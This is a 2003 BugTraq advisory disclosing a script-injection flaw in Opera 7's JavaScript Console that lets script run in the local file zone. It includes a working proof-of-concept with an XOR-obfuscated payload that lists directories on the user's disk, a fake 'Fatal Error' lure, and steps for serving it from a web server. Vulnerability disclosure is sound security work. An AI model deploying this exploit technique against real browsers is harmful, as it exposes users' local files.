BugTraq
[Opera 7] Yet Another Story of "Phantom of the Opera" Apr 27 2003 06:09PM
nesumin (nesumin softhome net)
Greetings.
We, :: Operash :: here release the information about vulnerability of Opera.

_________________________________________________

------------------------------------------------------------------------
---------
SYNOPSIS : [Opera 7] Script Injection Vulnerability in JavaScript Console
- Yet another story of "Phantom of the Opera".
PRODUCT : Opera for Windows
VERSIONS : 7.10 build 2840
7.03 build 2670
7.02 build 2668
7.02 bork build 2656b
7.01 build 2651
VENDOR : Opera Software ASA (http://www.opera.com/)
SEVERITY : Medium.
Access to local disk.
DISCOVERD BY : :: Operash :: (nesumin)
REPORTED DATE : 2003-04-25
PUBLISHED DATE : 2003-04-28
------------------------------------------------------------------------
----------

0. PRODUCT INFORMATION
========================

Opera for Windows is a GUI base Web browser.
Opera Software ASA (http://www.opera.com/)

1. DESCRIPTION
================

"JavaScript Console" of Opera 7 that displays the Error Message of JavaScript has
the vulnerability that allows to inject an arbitrary script in a link.

This vulnerability can cause an execution of arbitrary script in Local Security Zone (file://)
when a user opens the link that contains an arbitrary script generated by
a manipulated error message on the JavaScript Console.

This is a Security-Hole that makes it possible to leak the data on a User's Local Disk
to the outside.

2. SYSTEMS AFFECTED
=====================

Opera 7.10 build 2840
Opera 7.03 build 2670
Opera 7.02 build 2668
Opera 7.02 bork build 2656b
Opera 7.01 build 2651

3. SYSTEMS NOT AFFECTED
=======================

----

4. EXAMINES
=============

Opera for windows (English/Japanese) :
Opera 7.10 build 2840
Opera 7.03 build 2670
Opera 7.02 build 2668
Opera 7.02 bork build 2656b
Opera 7.01 build 2651

Platform :
Windows 98SE Japanese
Windows 2000 PRO SP3 Japanese

5. TO VENDOR
==============

Reported (2003/04/25).

6. SOLUTION
==============

Disable JavaScript.

7. DETAILS
=============

This vulnerability is caused by script in Opera 7's console.html
that is not enough to sanitize single-quote.
It allows to inject an arbitrary script into the link on the JavaScript Console.
It's possible that an arbitrary script will be infixed into the link
with the error message including the single-quote like below.

var message = "http://');alert(location.href+'";
opera.postError( message );
location.href = "file://localhost/console.html";

OUTPUT:

<a href="javascript:opera.openInSourceViewer('http://');alert(location.href
+'')">***</a>

Although Opera7.10 has a fix that makes "'" and "'" deleted,
it's not enough to prevent this vulnerability.
For instance, if a data like "'" is used instead of "'" like below,
it is interpreted as "'" in the link and an arbitrary script can be injected.

var message = "http://');alert(location.href+'";
opera.postError( message );
location.href = "file://localhost/console.html";

By this vulnerability, if user opens the link on the JavaScript Console,
the script that can get directory information and read file's content
from user's local disk is executed on "file://localhost/console.html",

This vulnerability is related to the vulnerability that has been published
by GreyMagic Software at 2003-01-29.

GreyMagic Software - Phantom of the Opera (GM#003-OP)
http://security.greymagic.com/adv/gm003-op/

Though that GM#003-OP was issue of double-quote,
this vulnerability is an issue of single-quote in same part of the script.
Naturally, vendor should also have checked the case of single-quote
when GreyMagic Software had reported the double-quote issue to them.
But they neglected and left it.
We assume that a deficiency of diligence has brought this issue in its train.

8. SAMPLE CODE
================

This code generates a link on the JavaScript Console
to read directory list from local disk "c:\" and display it.

[1] replace the "script" instead of "Xploit" and save as html file
[2] upload to WEB server
[3] open with Opera(enable javascript)
[4] click a link on the JavaScript Console

----------------------------------------------------------------
<Xploit>
var depth = 1;
var startdir = "file://localhost/c:/";

// arbitrary script
var evil_script="";
evil_script += "function dt(dp){\n";
evil_script += "var i,j,tr,td,b;\n";
evil_script += "if('complete'==fr.document.readyState&&";
evil_script += "fr.document.getElementsByTagName('base').item(0)){\n";
evil_script += "tr=fr.document.getElementsByTagName('tr');\nb='<hr>\\n'";
evil_script += "+fr.document.getElementsByTagName('base').item(0).href;\n";
evil_script += "b+='<br>\\n'+'Count : '+tr.length+'<br>\\n';\n";
evil_script += "for(i=1;i<tr.length;++i){\n";
evil_script += "td = tr.item(i).getElementsByTagName('td');\n";
evil_script += "if (td.item(0).innerText.match(/^\\.\\.?$/))continue;\n";
evil_script += "if(dp>0 && td.item(0).getElementsByTagName('img')";
evil_script += ".item(0).src.match(/\\\\folder\\.gif$/))\n";
evil_script += "ds.push(td.item(0).getElementsByTagName('a').item(0).href);\n";
evil_script += "for (j=0;j<4;++j)b+=td.item(j).innerText+' ';";
evil_script += "b+='<br>\\n';}tree.innerHTML+=b;\n";
evil_script += "if (0>=ds.length)return;fr.location.href=ds.pop();--dp;}\n";
evil_script += "setTimeout('dt('+dp+');',30);}\nvar ds = new Array(),";
evil_script += "b = document.getElementsByTagName('body').item(0),";
evil_script += "f = document.createElement('iframe'),";
evil_script += "d = document.createElement('div');\n";
evil_script += "d.setAttribute('id','tree');b.appendChild(d);\n";
evil_script += "f.style.width=f.style.height=f.style.border=0;\n";
evil_script += "f.setAttribute('src','"+startdir+"');\n";
evil_script += "f.setAttribute('id','fr');\n";
evil_script += "b.appendChild(f);\n";
evil_script += "dt("+depth+");\n";

// xor and URLEncode
evil_script = escape(evil_script.replace(/./g,function(s){
return(String.fromCharCode(0x80^s.charCodeAt(0)))}));

var msg = "http://";

// fake url
msg += "foo.hogebar.foo/bug?summary=fatal%20error&type=unknown&content=%90%12%3
8%79%80m";

// code
msg += "');m='";
msg += evil_script;
msg += "';eval(unescape(m).replace(/./g,function(s){";
msg += "return(String.fromCharCode(0x80^s.charCodeAt(0)))})+'\n";

// fake message
msg += "\n";
msg += "Fatal Error !!!!\n\n";
msg += " Please click above link.\n"; // :p

opera.postError(msg);
//window.open("file://localhost/console.html","","");
location.href = "file://localhost/console.html";

</Xploit>
----------------------------------------------------------------

9. DISCLAIMER
===============

a. We cannot guarantee the accuracy of all statements in this information.
b. We do not anticipate issuing updated versions of this information
unless there is some material change in the facts.
c. And we will take no responsibility for any kinds of disadvantages by
using this information.
d. Copyright is held by :: Operash :: and relatives.

10. CONTACT, ETC
=================

:: Operash ::
[ Unofficial Opera's Bug and Security information site for Japanese people ]

imagine (Operash Webmaster)
nesumin <nesumin (at) softhome (dot) net [email concealed]>

Thanks to :

melorin
piso(sexy)

_________________________________________________

-------
nesumin <nesumin (at) softhome (dot) net [email concealed]>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus